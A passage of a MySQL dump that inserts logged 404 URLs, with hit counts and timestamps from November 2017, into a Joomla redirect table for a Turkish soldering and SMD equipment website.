00:00:00',301),(10348,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,product_sku',NULL,'','',540,0,'2017-11-09 03:43:07','0000-00-00 00:00:00',301),(10349,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/dirdesc',NULL,'','',544,0,'2017-11-09 03:43:12','0000-00-00 00:00:00',301),(10350,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/gf-12-hc-ht-detail',NULL,'','',275,0,'2017-11-09 03:43:16','0000-00-00 00:00:00',301),(10351,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',270,0,'2017-11-09 03:43:19','0000-00-00 00:00:00',301),(10352,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/ly-8c-detail',NULL,'','',270,0,'2017-11-09 03:43:21','0000-00-00 00:00:00',301),(10353,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',262,0,'2017-11-09 03:43:23','0000-00-00 00:00:00',301),(10354,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı',NULL,'','',546,0,'2017-11-09 03:43:30','0000-00-00 00:00:00',301),(10355,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/am100-detail',NULL,'','',270,0,'2017-11-09 03:43:33','0000-00-00 00:00:00',301),(10356,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',269,0,'2017-11-09 03:43:36','0000-00-00 00:00:00',301),(10357,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',533,0,'2017-11-09 03:43:38','0000-00-00 00:00:00',301),(10358,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',535,0,'2017-11-09 03:43:40','0000-00-00 00:00:00',301),(10359,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,category_name',NULL,'','',541,0,'2017-11-09 03:43:47','0000-00-00 00:00:00',301),(10360,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',535,0,'2017-11-09 03:43:50','0000-00-00 00:00:00',301),(10361,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',536,0,'2017-11-09 03:43:58','0000-00-00 00:00:00',301),(10362,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/dirdesc',NULL,'','',547,0,'2017-11-09 03:44:07','0000-00-00 00:00:00',301),(10363,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/mx200lp-detail',NULL,'','',273,0,'2017-11-09 03:44:12','0000-00-00 00:00:00',301),(10364,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',275,0,'2017-11-09 03:44:14','0000-00-00 00:00:00',301),(10365,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız',NULL,'','',547,0,'2017-11-09 03:44:18','0000-00-00 00:00:00',301),(10366,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,`p`.product_sku',NULL,'','',547,0,'2017-11-09 03:44:20','0000-00-00 00:00:00',301),(10367,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',549,0,'2017-11-09 03:44:22','0000-00-00 00:00:00',301),(10368,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme',NULL,'','',527,0,'2017-11-09 03:44:36','0000-00-00 00:00:00',301),(10369,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',525,0,'2017-11-09 03:44:39','0000-00-00 00:00:00',301),(10370,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/dirdesc',NULL,'','',524,0,'2017-11-09 03:44:44','0000-00-00 00:00:00',301),(10371,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',264,0,'2017-11-09 03:44:49','0000-00-00 00:00:00',301),(10372,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',262,0,'2017-11-09 03:44:52','0000-00-00 00:00:00',301),(10373,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-detail',NULL,'','',262,0,'2017-11-09 03:44:54','0000-00-00 00:00:00',301),(10374,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',258,0,'2017-11-09 03:44:56','0000-00-00 00:00:00',301),(10375,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',521,0,'2017-11-09 03:45:03','0000-00-00 00:00:00',301),(10376,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',519,0,'2017-11-09 03:45:05','0000-00-00 00:00:00',301),(10377,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',513,0,'2017-11-09 03:45:08','0000-00-00 00:00:00',301),(10378,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',519,0,'2017-11-09 03:45:16','0000-00-00 00:00:00',301),(10379,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',522,0,'2017-11-09 03:45:21','0000-00-00 00:00:00',301),(10380,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',523,0,'2017-11-09 03:45:24','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (10381,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',517,0,'2017-11-09 03:45:31','0000-00-00 00:00:00',301),(10382,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',510,0,'2017-11-09 03:45:37','0000-00-00 00:00:00',301),(10383,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',522,0,'2017-11-09 03:45:49','0000-00-00 00:00:00',301),(10384,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',521,0,'2017-11-09 03:45:55','0000-00-00 00:00:00',301),(10385,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',519,0,'2017-11-09 03:45:58','0000-00-00 00:00:00',301),(10386,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',514,0,'2017-11-09 03:46:30','0000-00-00 00:00:00',301),(10387,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/mx200lp-detail',NULL,'','',252,0,'2017-11-09 03:46:38','0000-00-00 00:00:00',301),(10388,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',254,0,'2017-11-09 03:46:41','0000-00-00 00:00:00',301),(10389,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız',NULL,'','',509,0,'2017-11-09 03:46:46','0000-00-00 00:00:00',301),(10390,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku',NULL,'','',505,0,'2017-11-09 03:46:49','0000-00-00 00:00:00',301),(10391,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',509,0,'2017-11-09 03:46:51','0000-00-00 00:00:00',301),(10392,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',254,0,'2017-11-09 03:46:54','0000-00-00 00:00:00',301),(10393,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/npm-detail',NULL,'','',255,0,'2017-11-09 03:46:55','0000-00-00 00:00:00',301),(10394,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',255,0,'2017-11-09 03:46:58','0000-00-00 00:00:00',301),(10395,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku',NULL,'','',507,0,'2017-11-09 03:47:03','0000-00-00 00:00:00',301),(10396,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,mf_name',NULL,'','',508,0,'2017-11-09 03:47:05','0000-00-00 00:00:00',301),(10397,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',509,0,'2017-11-09 03:47:07','0000-00-00 00:00:00',301),(10398,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',260,0,'2017-11-09 03:47:17','0000-00-00 00:00:00',301),(10399,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/e-bar-detail',NULL,'','',259,0,'2017-11-09 03:47:19','0000-00-00 00:00:00',301),(10400,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',255,0,'2017-11-09 03:47:21','0000-00-00 00:00:00',301),(10401,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,product_sku',NULL,'','',255,0,'2017-11-09 03:47:24','0000-00-00 00:00:00',301),(10402,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/cs40-detail',NULL,'','',251,0,'2017-11-09 03:47:26','0000-00-00 00:00:00',301),(10403,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/dirdesc',NULL,'','',250,0,'2017-11-09 03:47:29','0000-00-00 00:00:00',301),(10404,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/le-40v-detail',NULL,'','',252,0,'2017-11-09 03:47:31','0000-00-00 00:00:00',301),(10405,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/ls60v-detail',NULL,'','',257,0,'2017-11-09 03:47:34','0000-00-00 00:00:00',301),(10406,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,category_name',NULL,'','',258,0,'2017-11-09 03:47:36','0000-00-00 00:00:00',301),(10407,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,mf_name',NULL,'','',257,0,'2017-11-09 03:47:38','0000-00-00 00:00:00',301),(10408,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,product_name',NULL,'','',251,0,'2017-11-09 03:47:40','0000-00-00 00:00:00',301),(10409,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/dirdesc',NULL,'','',263,0,'2017-11-09 03:47:43','0000-00-00 00:00:00',301),(10410,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/gf-12-hc-ht-detail',NULL,'','',259,0,'2017-11-09 03:47:45','0000-00-00 00:00:00',301),(10411,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/ly-8c-detail',NULL,'','',254,0,'2017-11-09 03:47:47','0000-00-00 00:00:00',301),(10412,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/am100-detail',NULL,'','',250,0,'2017-11-09 03:47:49','0000-00-00 00:00:00',301),(10413,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/by,category_name',NULL,'','',253,0,'2017-11-09 03:47:52','0000-00-00 00:00:00',301),(10414,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_sku',NULL,'','',248,0,'2017-11-09 03:47:54','0000-00-00 00:00:00',301),(10415,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/cm-602-l-detail',NULL,'','',250,0,'2017-11-09 03:47:56','0000-00-00 00:00:00',301),(10416,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/dirdesc',NULL,'','',254,0,'2017-11-09 03:47:59','0000-00-00 00:00:00',301),(10417,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/mx200lp-3-detail',NULL,'','',259,0,'2017-11-09 03:48:01','0000-00-00 00:00:00',301),(10418,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim',NULL,'','',45,0,'2017-11-09 03:52:03','0000-00-00 00:00:00',301),(10419,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-09 03:55:48','0000-00-00 00:00:00',301),(10420,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-11-09 03:56:02','0000-00-00 00:00:00',301),(10421,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_sku',NULL,'','',431,0,'2017-11-09 03:56:12','0000-00-00 00:00:00',301),(10422,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,category_name',NULL,'','',423,0,'2017-11-09 03:56:41','0000-00-00 00:00:00',301),(10423,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',415,0,'2017-11-09 03:57:00','0000-00-00 00:00:00',301),(10424,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name',NULL,'','',414,0,'2017-11-09 03:57:23','0000-00-00 00:00:00',301),(10425,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',419,0,'2017-11-09 03:57:31','0000-00-00 00:00:00',301),(10426,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',208,0,'2017-11-09 03:57:39','0000-00-00 00:00:00',301),(10427,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',365,0,'2017-11-09 03:58:03','0000-00-00 00:00:00',301),(10428,'http://www.3s-technologies.com.tr/en/products/275-k100-1mm-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-09 04:16:39','0000-00-00 00:00:00',301),(10429,'http://3s-technologies.com.tr/tr/urunler/avf-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-09 04:26:01','0000-00-00 00:00:00',301),(10430,'http://www.3s-technologies.com.tr/en/?option=com_easyblog&view=dashboard&layout=write',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_easyblog&view=dashboard&layout=write','',212,0,'2017-11-09 04:26:43','0000-00-00 00:00:00',301),(10431,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku?error=404&language=en-gb',NULL,'','',1,0,'2017-11-09 05:12:58','0000-00-00 00:00:00',301),(10432,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,ordering?language=tr-tr',NULL,'','',24,0,'2017-11-09 06:09:40','0000-00-00 00:00:00',301),(10433,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler',NULL,'','',8,0,'2017-11-09 06:10:04','0000-00-00 00:00:00',301),(10434,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri',NULL,'','',6,0,'2017-11-09 06:10:06','0000-00-00 00:00:00',301),(10435,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/flux',NULL,'','',6,0,'2017-11-09 06:10:08','0000-00-00 00:00:00',301),(10436,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim',NULL,'','',8,0,'2017-11-09 06:10:09','0000-00-00 00:00:00',301),(10437,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim',NULL,'','',8,0,'2017-11-09 06:10:11','0000-00-00 00:00:00',301),(10438,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer',NULL,'','',6,0,'2017-11-09 06:10:13','0000-00-00 00:00:00',301),(10439,'http://3s-technologies.com.tr/index.php/tr/ueruenler/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-09 06:33:48','0000-00-00 00:00:00',301),(10440,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',392,0,'2017-11-09 06:37:07','0000-00-00 00:00:00',301),(10441,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/zero-ion-g3-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-09 06:52:43','0000-00-00 00:00:00',301),(10442,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',15,0,'2017-11-09 06:55:29','0000-00-00 00:00:00',301),(10443,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'http://www.3s-technologies.com.tr/tr/','',27740,0,'2017-11-09 07:34:06','0000-00-00 00:00:00',301),(10444,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/k_cwlf_150x150.png',NULL,'','',1,0,'2017-11-09 07:34:22','0000-00-00 00:00:00',301),(10445,'http://www.3s-technologies.com.tr/tr/tp?1',NULL,'','',1,0,'2017-11-09 07:49:00','0000-00-00 00:00:00',301),(10446,'http://www.3s-technologies.com.tr/tr/tp=1',NULL,'','',2,0,'2017-11-09 07:49:08','0000-00-00 00:00:00',301),(10447,'http://3s-technologies.com.tr/tr/favicon.ico',NULL,'','',612,0,'2017-11-09 08:06:26','0000-00-00 00:00:00',301),(10448,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products',NULL,'','',6,0,'2017-11-09 09:02:07','0000-00-00 00:00:00',301),(10449,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',549,0,'2017-11-09 09:02:09','0000-00-00 00:00:00',301),(10450,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',554,0,'2017-11-09 09:02:10','0000-00-00 00:00:00',301),(10451,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',551,0,'2017-11-09 09:02:15','0000-00-00 00:00:00',301),(10452,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',552,0,'2017-11-09 09:02:19','0000-00-00 00:00:00',301),(10453,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',572,0,'2017-11-09 09:02:22','0000-00-00 00:00:00',301),(10454,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',560,0,'2017-11-09 09:02:25','0000-00-00 00:00:00',301),(10455,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',553,0,'2017-11-09 09:02:33','0000-00-00 00:00:00',301),(10456,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız',NULL,'','',552,0,'2017-11-09 09:02:35','0000-00-00 00:00:00',301),(10457,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',554,0,'2017-11-09 09:02:37','0000-00-00 00:00:00',301),(10458,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',546,0,'2017-11-09 09:02:38','0000-00-00 00:00:00',301),(10459,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',547,0,'2017-11-09 09:02:42','0000-00-00 00:00:00',301),(10460,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/by,category_name',NULL,'','',556,0,'2017-11-09 09:02:49','0000-00-00 00:00:00',301),(10461,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',547,0,'2017-11-09 09:02:53','0000-00-00 00:00:00',301),(10462,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',272,0,'2017-11-09 09:02:56','0000-00-00 00:00:00',301),(10463,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/dirdesc',NULL,'','',552,0,'2017-11-09 09:03:00','0000-00-00 00:00:00',301),(10464,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',280,0,'2017-11-09 09:03:03','0000-00-00 00:00:00',301),(10465,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',556,0,'2017-11-09 09:03:08','0000-00-00 00:00:00',301),(10466,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',565,0,'2017-11-09 09:03:09','0000-00-00 00:00:00',301),(10467,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,category_name',NULL,'','',541,0,'2017-11-09 09:03:14','0000-00-00 00:00:00',301),(10468,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',549,0,'2017-11-09 09:03:16','0000-00-00 00:00:00',301),(10469,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,mf_name',NULL,'','',546,0,'2017-11-09 09:03:21','0000-00-00 00:00:00',301),(10470,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',541,0,'2017-11-09 09:03:23','0000-00-00 00:00:00',301),(10471,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',549,0,'2017-11-09 09:03:28','0000-00-00 00:00:00',301),(10472,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',556,0,'2017-11-09 09:03:31','0000-00-00 00:00:00',301),(10473,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',541,0,'2017-11-09 09:03:34','0000-00-00 00:00:00',301),(10474,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',547,0,'2017-11-09 09:03:36','0000-00-00 00:00:00',301),(10475,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',545,0,'2017-11-09 09:03:41','0000-00-00 00:00:00',301),(10476,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',544,0,'2017-11-09 09:03:42','0000-00-00 00:00:00',301),(10477,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',549,0,'2017-11-09 09:03:48','0000-00-00 00:00:00',301),(10478,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',552,0,'2017-11-09 09:03:51','0000-00-00 00:00:00',301),(10479,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',547,0,'2017-11-09 09:03:56','0000-00-00 00:00:00',301),(10480,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',552,0,'2017-11-09 09:03:59','0000-00-00 00:00:00',301),(10481,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',274,0,'2017-11-09 09:04:03','0000-00-00 00:00:00',301),(10482,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',270,0,'2017-11-09 09:04:04','0000-00-00 00:00:00',301),(10483,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',273,0,'2017-11-09 09:04:06','0000-00-00 00:00:00',301),(10484,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',281,0,'2017-11-09 09:04:08','0000-00-00 00:00:00',301),(10485,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın',NULL,'','',557,0,'2017-11-09 09:04:11','0000-00-00 00:00:00',301),(10486,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',553,0,'2017-11-09 09:04:13','0000-00-00 00:00:00',301),(10487,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',557,0,'2017-11-09 09:04:14','0000-00-00 00:00:00',301),(10488,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',546,0,'2017-11-09 09:04:19','0000-00-00 00:00:00',301),(10489,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',547,0,'2017-11-09 09:04:22','0000-00-00 00:00:00',301),(10490,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',541,0,'2017-11-09 09:04:28','0000-00-00 00:00:00',301),(10491,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',550,0,'2017-11-09 09:04:30','0000-00-00 